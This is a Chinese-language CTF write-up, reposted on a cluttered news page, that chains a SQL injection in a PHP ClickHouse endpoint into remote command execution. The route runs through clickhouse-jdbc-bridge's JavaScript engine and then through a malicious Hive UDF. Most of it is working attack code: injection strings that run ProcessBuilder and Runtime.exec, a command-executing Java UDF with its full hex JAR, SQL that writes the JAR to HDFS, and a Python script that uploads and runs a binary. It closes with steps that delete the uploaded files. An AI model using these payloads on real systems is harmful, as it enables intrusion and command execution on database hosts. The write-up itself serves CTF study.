当前位置: 首页 > news >正文

网站可以做匿名聊天吗网站正在建设中mp4

网站可以做匿名聊天吗,网站正在建设中mp4,做网站流量赚钱,品牌网站建设流程前置知识 ClickHouse#xff1a;是一个开源的列式数据库管理系统 clickhouse-jdbc-bridge#xff1a;clickhouse数据库和jdbc交互的工具 HDFS#xff08;Hadoop Distributed File System#xff09;#xff1a;专为大数据存储和处理而设计。 审计 ?php error_re…前置知识 ClickHouse是一个开源的列式数据库管理系统 clickhouse-jdbc-bridgeclickhouse数据库和jdbc交互的工具 HDFSHadoop Distributed File System专为大数据存储和处理而设计。 审计 ?php error_reporting(E_ALL ^ E_DEPRECATED); require __DIR__ . /../vendor/autoload.php; if (!isset($_GET[query])) {show_source(__FILE__);exit; } $config [host clickhouse,port 8123,username default,password ]; $db new ClickHouseDB\Client($config); $db-database(default); $db-setTimeout(1.5); $db-setTimeout(10); $db-setConnectTimeOut(5); $db-ping(true); $statement $db-select(SELECT * FROM u_data WHERE . $_GET[query] . LIMIT 10); echo (json_encode($statement-rows()));// Err Uncaught ClickHouseDB\Exception\DatabaseException: connect to hive metastore: thrift or // Err NoSuchObjectException(messagehive.default.u_data table not found), // please wait for 1min, hive is not initialized.这是一个提供数据库查询的php代码不过里面泄露了clickhouse 数据库管理系统的配置信息并且第20处存在sql注入 根据官方文档https://github.com/ClickHouse/clickhouse-jdbc-bridge/blob/v2.1.0/README.md#usage 其中的clickhouse-jdbc-bridge允许执行sql语句脚本文件以及js代码等等 -- adhoc query select * from jdbc(ch-server, system, select * from query_log where user ! default) select * from jdbc(ch-server, select * from query_log where user ! default) select * from jdbc(ch-server, select * from system.query_log where user ! default)-- table query select * from jdbc(ch-server, system, query_log) select * from jdbc(ch-server, query_log)-- saved query select * from jdbc(ch-server, scripts/show-query-logs.sql)-- named query select * from jdbc(ch-server, show-query-logs)-- scripting select * from jdbc(script, [1,2,3]) select * from jdbc(script, js, [1,2,3]) select * from jdbc(script, scripts/one-two-three.js)其中在 Java 8 开始引入的 JavaScript 引擎Nashorn。Nashorn支持在Java应用中处理脚本可以用JavaScript语法来编写代码。 所以我们可以利用Java中的Runtime类来执行系统命令。 构造sql注入语句,执行rce 10 UNION ALL SELECT results, , , FROM jdbc(script:, java.lang.Runtime.getRuntime().exec(ls))构造js代码回显数据 #创建ProcessBuilder 实例用于执行系统命令 var a new java.lang.ProcessBuilder(/readflag);#获取启动的进程 b a.start();#获取标准输出流 c b.getInputStream();#构建StringBuilder实例用于回显字符串 sb new java.lang.StringBuilder();#循环遍历输入流并将结果添加到实例sb中 d 0; while ((d c.read()) ! -1) {sb.append(String.fromCharCode(d)); }#关闭输入流释放资源 c.close();# 打印输出 sb.toString();然后构造sql语句回显数据 10 UNION ALL SELECT results, , , FROM jdbc(script, var anew java.lang.ProcessBuilder(/readflag),ba.start(),cb.getInputStream(),sbnew java.lang.StringBuilder(),d0;while ((dc.read())!-1){sb.append(String.fromCharCode(d))};c.close();sb.toString())这里我们就拿到的第一段flag。 第二个部分的flag在hive的机器里根据hive的官方文档https://cwiki.apache.org/confluence/display/Hive/LanguageManualDDL#LanguageManualDDL-CreateFunction CREATE FUNCTION [db_name.]function_name AS class_name[USING JAR|FILE|ARCHIVE file_uri [, JAR|FILE|ARCHIVE file_uri] ];允许通过上传文件的方式构造用户自定义函数 我们开始编写自定义函数进行rce打包为jar包 package udf; import org.apache.hadoop.hive.ql.exec.UDF; import org.apache.hadoop.io.Text; import java.io.*; import java.lang.*;public final class Exec extends UDF {public Text evaluate(final Text s) {if (s null) { return null; }try {String result ;String command s.toString();Process p Runtime.getRuntime().exec(command);BufferedReader in new BufferedReader(new InputStreamReader(p.getInputStream()));String inputLine;while ((inputLine in.readLine()) ! null) {result inputLine \n;}in.close();return new Text(result);} catch (IOException e) {return new Text(e.toString());}} }将构造好的jar包进行16进制转储 504B0304140008080800908A1457000000000000000000000000090004004D4554412D494E462FFECA00000300504B0708000000000200000000000000504B0304140008080800908A1457000000000000000000000000140000004D4554412D494E462F4D414E49464553542E4D46F34DCCCB4C4B2D2ED10D4B2D2ACECCCFB35230D433E0E5722E4A4D2C494DD175AA040958E819C41B19182968F8172526E7A42A38E71715E417259600D56BF272F1720100504B07084DCD370F4400000045000000504B03040A0000080000E0891457000000000000000000000000040000007564662F504B03041400080808008F8A14570000000000000000000000000E0000007564662F457865632E636C6173738554DB521341103D13929DB02C04C235DE50144820B082281810919BA209580429F3E6920C6135ECC6B04BF147BEE24B62992A1FB5CA6FF01BFC024BEC59AE01D4247576A64F9FEE9E9EDE7CFFFDF90B8031ACA8E8447F10511561C4540C6050429C63886358858EBB2A384654281895708F634C85867E09F78378209F31C98C734CC8280F39122ADA10E398E4986250A64CCB74A619EAA2B17506FF9C9D130CA1A4698965777B4394D68C8D02598262D728B88643CB8968D22EE575A36864B784BE65E46CBBA89BB6BE26F69CC9D83F3886C6B46364DFA58CA217D5AB6182E311C7B477A604839AB6DD52562C9A3269FDC29EC80EBF35760D0D5D8830D0711E6386E3898659CC6998C702438774904966DDCD4D5112B95561E4448921724C2C5945D7493B25616C1F729450C3229ECAB0CF242C69788E19864E4F5230ACBC4EFEA6959F75CD020934BC409281A91A52B290C85F4F29A32D33B49EE45E59D8CB8AA263DA1675D1CD6DEAF2500C3D17236C99BB427F5FD00539E8AFE617199ACF97C3D0726A7A59B2B3626787C23AF631DD168D25CF8B266B54ABAEE598DBD45D352F9C934D7B8DEEC84C42BFF0AAED8F5E8C7A5670540A099A28EA997E534B8F23D75E04B976452F25E41CB69E528737E65983C4E7E468D2DC1AC5A2B0720C43FFA9ACE61A2969205BB077BC035FA25BC7083AE8A5931F1F981C3AC22BB4BB4E4F9A3F04062A601F69C1709550F18C9CF09AE7225D7F224016C01AFC8600DB0FFB528365D42D7F827FA88C40C25F8592A9826722FE328215D457A026029140190D9984F215DD5568990A1AE365344514827088A08CE6D487831FD2ADA58A70265E41EB7ECA5B95D12E37945DC11B18F476FBBCDA86D140584F568DB0114DF4ED440871B4609CFE0BD2E4F91AEDA4E8C0063137C87B147EE500BD5038BA396E72DCF27E3D1CB7815FE8A3DD0185F21DD2601C77286FAFD7AEBE3F504B07083D09D2E8BA020000B9040000504B03041400080808008A8A14570000000000000000000000000D0000007564662F457865632E6A6176617D51C14EC3300CBDF72BCC4E2993F203532F88214D42020DB87131A9DB06D224A4C93684FAEF245DD795219143E43CBFF7ECD816C507D604A1AC56996CAD711E8CAB395A140DF1064B632C6FE48EF8A7E27420C15F6EEFFEA14AC39FE9E027C63BEE3081D7BF1185BA4E186436BC2929A0921A1508855D07EB5806A209E9B283580EBE33809197CC8176A8027A6247D58075F940039015B00E8A0274502A82E0C807A787E70AFA81E3DD170CC15192CE937752D791DC05E5A180C562759913A66D519731D9716F8E20CBCFB4476704C5FE6D646C83F6B2255E931F43960FF363A3CB4C7713AA8A1C955BC2921C481DF59AF617384BD046DBE06365C276446D2A3183599EE77F3A97297F2F359D33FB462A02C6A6542C2A358F16657A451BB89A6638A9D21947B42CCEB6B084C5AB9E4DAC9FA2E82994E9683EA8D346E287D2EED8D17124F420D08B06D8E6617D1064BD341A68DEC4A59C66DB38996459BAFA1F504B0708F7E1F46D60010000E0020000504B01021400140008080800908A14570000000002000000000000000900040000000000000000000000000000004D4554412D494E462FFECA0000504B01021400140008080800908A14574DCD370F440000004500000014000000000000000000000000003D0000004D4554412D494E462F4D414E49464553542E4D46504B01020A000A0000080000E08914570000000000000000000000000400000000000000000000000000C30000007564662F504B010214001400080808008F8A14573D09D2E8BA020000B90400000E00000000000000000000000000E50000007564662F457865632E636C617373504B010214001400080808008A8A1457F7E1F46D60010000E00200000D00000000000000000000000000DB0300007564662F457865632E6A617661504B0506000000000500050026010000760500000000我们可以利用ClickHouse数据库操作HDFS这里我们通过连接到clickhouse数据库执行sql命令上传jar包jar包的存放路径为HDFS根目录下的a.jar 10 UNION ALL SELECT results, , , FROM jdbc(jdbc:clickhouse://127.0.0.1:8123, CREATE TABLE hdfs_test (name String) ENGINEHDFS(\hdfs://namenode:8020/a.jar\, \Native\);)然后将数据上传至hdfs:///a.jar\ jdbc(jdbc:clickhouse://127.0.0.1:8123, INSERT INTO hdfs_test SETTINGS hdfs_create_new_file_on_insertTRUE VALUES (unhex(\504B0304140008080800908A1457000000000000000000000000090004004D4554412D494E462FFECA00000300504B0708000000000200000000000000504B0304140008080800908A1457000000000000000000000000140000004D4554412D494E462F4D414E49464553542E4D46F34DCCCB4C4B2D2ED10D4B2D2ACECCCFB35230D433E0E5722E4A4D2C494DD175AA040958E819C41B19182968F8172526E7A42A38E71715E417259600D56BF272F1720100504B07084DCD370F4400000045000000504B03040A0000080000E0891457000000000000000000000000040000007564662F504B03041400080808008F8A14570000000000000000000000000E0000007564662F457865632E636C6173738554DB521341103D13929DB02C04C235DE50144820B082281810919BA209580429F3E6920C6135ECC6B04BF147BEE24B62992A1FB5CA6FF01BFC024BEC59AE01D4247576A64F9FEE9E9EDE7CFFFDF90B8031ACA8E8447F10511561C4540C6050429C63886358858EBB2A384654281895708F634C85867E09F78378209F31C98C734CC8280F39122ADA10E398E4986250A64CCB74A619EAA2B17506FF9C9D130CA1A4698965777B4394D68C8D02598262D728B88643CB8968D22EE575A36864B784BE65E46CBBA89BB6BE26F69CC9D83F3886C6B46364DFA58CA217D5AB6182E311C7B477A604839AB6DD52562C9A3269FDC29EC80EBF35760D0D5D8830D0711E6386E3898659CC6998C702438774904966DDCD4D5112B95561E4448921724C2C5945D7493B25616C1F729450C3229ECAB0CF242C69788E19864E4F5230ACBC4EFEA6959F75CD020934BC409281A91A52B290C85F4F29A32D33B49EE45E59D8CB8AA263DA1675D1CD6DEAF2500C3D17236C99BB427F5FD00539E8AFE617199ACF97C3D0726A7A59B2B3626787C23AF631DD168D25CF8B266B54ABAEE598DBD45D352F9C934D7B8DEEC84C42BFF0AAED8F5E8C7A5670540A099A28EA997E534B8F23D75E04B976452F25E41CB69E528737E65983C4E7E468D2DC1AC5A2B0720C43FFA9ACE61A2969205BB077BC035FA25BC7083AE8A5931F1F981C3AC22BB4BB4E4F9A3F04062A601F69C1709550F18C9CF09AE7225D7F224016C01AFC8600DB0FFB528365D42D7F827FA88C40C25F8592A9826722FE328215D457A026029140190D9984F215DD5568990A1AE365344514827088A08CE6D487831FD2ADA58A70265E41EB7ECA5B95D12E37945DC11B18F476FBBCDA86D140584F568DB0114DF4ED440871B4609CFE0BD2E4F91AEDA4E8C0063137C87B147EE500BD5038BA396E72DCF27E3D1CB7815FE8A3DD0185F21DD2601C77286FAFD7AEBE3F504B07083D09D2E8BA020000B9040000504B03041400080808008A8A14570000000000000000000000000D0000007564662F457865632E6A6176617D51C14EC3300CBDF72BCC4E2993F203532F88214D42020DB87131A9DB06D224A4C93684FAEF245DD795219143E43CBFF7ECD816C507D604A1AC56996CAD711E8CAB395A140DF1064B632C6FE48EF8A7E27420C15F6EEFFEA14AC39FE9E027C63BEE3081D7BF1185BA4E186436BC2929A0921A1508855D07EB5806A209E9B283580EBE33809197CC8176A8027A6247D58075F940039015B00E8A0274502A82E0C807A787E70AFA81E3DD170CC15192CE937752D791DC05E5A180C562759913A66D519731D9716F8E20CBCFB4476704C5FE6D646C83F6B2255E931F43960FF363A3CB4C7713AA8A1C955BC2921C481DF59AF617384BD046DBE06365C276446D2A3183599EE77F3A97297F2F359D33FB462A02C6A6542C2A358F16657A451BB89A6638A9D21947B42CCEB6B084C5AB9E4DAC9FA2E82994E9683EA8D346E287D2EED8D17124F420D08B06D8E6617D1064BD341A68DEC4A59C66DB38996459BAFA1F504B0708F7E1F46D60010000E0020000504B01021400140008080800908A14570000000002000000000000000900040000000000000000000000000000004D4554412D494E462FFECA0000504B01021400140008080800908A14574DCD370F440000004500000014000000000000000000000000003D0000004D4554412D494E462F4D414E49464553542E4D46504B01020A000A0000080000E08914570000000000000000000000000400000000000000000000000000C30000007564662F504B010214001400080808008F8A14573D09D2E8BA020000B90400000E00000000000000000000000000E50000007564662F457865632E636C617373504B010214001400080808008A8A1457F7E1F46D60010000E00200000D00000000000000000000000000DB0300007564662F457865632E6A617661504B0506000000000500050026010000760500000000\)))但是由于click house不支持Thrift协议所以出题人利用 GolangUPX 编写了一个简易的hive客户端然后我们可以编写分时上传客户端程序并进行拼接 package mainimport (contextgithub.com/beltran/gohivelogos )func main() {conf : gohive.NewConnectConfiguration()conf.Username root // username maybe emptyconnection, errConn : gohive.Connect(hive, 10000, NONE, conf)if errConn ! nil {log.Fatalln(errConn)}defer connection.Close()cursor : connection.Cursor()ctx : context.Background()cursor.Exec(ctx, os.Args[1])if cursor.Err ! nil {log.Fatalln(cursor.Err)}defer cursor.Close()var s stringfor cursor.HasMore(ctx) {cursor.FetchOne(ctx, s)if cursor.Err ! nil {log.Fatalln(cursor.Err)}log.Println(s)} }#!/bin/bash # build in golang:1.21.3-bullseye go build -a -gcflagsall-l -B -wbfalse -ldflags -s -w upx --brute --best clickhouse-to-hive python分时上传脚本 import requestsdef query(s):a requests.get(https://ip:port, params{query: 10 union all select results, 2, 3, 4 from s})text a.texttry:return json.loads(text)[0][userid]except:return a.textdef rce_in_clickhouse(c):sql jdbc(script:, var anew java.lang.ProcessBuilder(\bash\,\-c\,\{{echo,{}}}|{{base64,-d}}|{{bash,-i}}\),ba.start(),cb.getInputStream(),sbnew java.lang.StringBuilder(),d0;while ((dc.read())!-1){{sb.append(String.fromCharCode(d))}};c.close();sb.toString()).format(base64.b64encode(c.encode(utf-8)).decode(utf-8))return query(sql)def upload():ch_to_hive open(./clickhouse-to-hive/clickhouse-to-hive, rb).read()ch_to_hive_parts [ch_to_hive[i:i4096] for i in range(0, len(ch_to_hive), 4096)]for i, r in enumerate(ch_to_hive_parts):# Cannot direct append because script will be executed twices base64.b64encode(r).decode(ascii)sql3 jdbc(script:, var fosJava.type(\java.io.FileOutputStream\);var fnew fos(\/tmp/ttt{}\);f.write(java.util.Base64.decoder.decode(\{}\));f.close();1).format(str(i), s)query(sql3)sql4 jdbc(script:, var FileJava.type(\java.io.File\);var fosJava.type(\java.io.FileOutputStream\);var fisJava.type(\java.io.FileInputStream\);var fnew fos(\/tmp/ch-to-hive\);for(var i0;i{};i){{var ffnew File(\/tmp/ttt\i.toString());var anew Array(ff.length()1).join(\1\).getBytes();var finew fis(ff);fi.read(a);fi.close();f.write(a);}}f.close();).format(str(len(ch_to_hive_parts)))query(sql4)rce_in_clickhouse(chmod x /tmp/ch-to-hive rm -rf /tmp/ttt*upload()最后通过此hive客户端加载自定义函数 10 UNION ALL SELECT results, , , FROM jdbc(script, var anew java.lang.ProcessBuilder(/tmp/ch-to-hive create function default.v as udf.Exec using jar hdfs:///a.jar),ba.start(),cb.getInputStream(),sbnew java.lang.StringBuilder(),d0;while ((dc.read())!-1){sb.append(String.fromCharCode(d))};c.close();sb.toString())读取/readflag数据 10 UNION ALL SELECT results, , , FROM jdbc(script, var anew java.lang.ProcessBuilder(/tmp/ch-to-hive SELECT default.v(/readflag)),ba.start(),cb.getInputStream(),sbnew java.lang.StringBuilder(),d0;while ((dc.read())!-1){sb.append(String.fromCharCode(d))};c.close();sb.toString())最后擦屁股删除上传的文件 10 UNION ALL SELECT results, , , FROM jdbc(script, var anew java.lang.ProcessBuilder(rm -rf /tmp/ch-to-hive),ba.start(),cb.getInputStream(),sbnew java.lang.StringBuilder(),d0;while ((dc.read())!-1){sb.append(String.fromCharCode(d))};c.close();sb.toString())
http://www.hkea.cn/news/14361592/

相关文章:

  • 太原模板建站定制公司网站主要几方面
  • 手机网站价格wordpress怎么设置title
  • 浙江凌宇环境建设公司网站网站建设交易平台
  • 好资源源码网站滨州网站建设铭盛信息
  • php语言开发网站流程网站挂黑链赚钱
  • 来宾网站制作电子商务平台需求分析
  • 网站推广方法大全wordpress搜索按分类
  • 中国最好的旅游网站apk打包工具
  • 设计师用什么做网站Wordpress搜索html页面
  • 如何把自己网站推广出去python源码下载
  • 泉州制作网页的网站新主题 老版本 wordpress
  • 珠海手机网站建设推广公司谷搜易外贸网站建设
  • 网站审批号一个人怎么做网站
  • 中国教育网站官网wordpress文章标题设为标签
  • 广东建设信息公开网站网站页面统计代码
  • 云龙网站开发搜索引擎seo如何优化
  • 厦门市建设执业资格注册管理中心网站无锡企业网站制作
  • 做网站导航能赚钱吗网上做兼职的网站
  • 手机网站适应屏幕加强图书馆网站建设
  • 深圳设计网站培训学校建设基金会网站
  • 网站做app要权限广州市住房和城乡建设局阳光家缘
  • 汕头网站网店建设静态网站开发与实施的论文
  • 网站设计公司多少钱筑梦网站建设
  • 公司重名 做网站晋江市建设局网站
  • 高中信息技术网站建设单页营销网站模板
  • 网站开发人员的水平北京网站优化效果
  • 提高网站目标流量企业品牌vi设计公司
  • 公司行政负责做网站吗浙江省城乡建设监方网站
  • 专业网站优化方案WordPress主题设置数据库
  • 网站设计有创意的主题58这种网站怎么做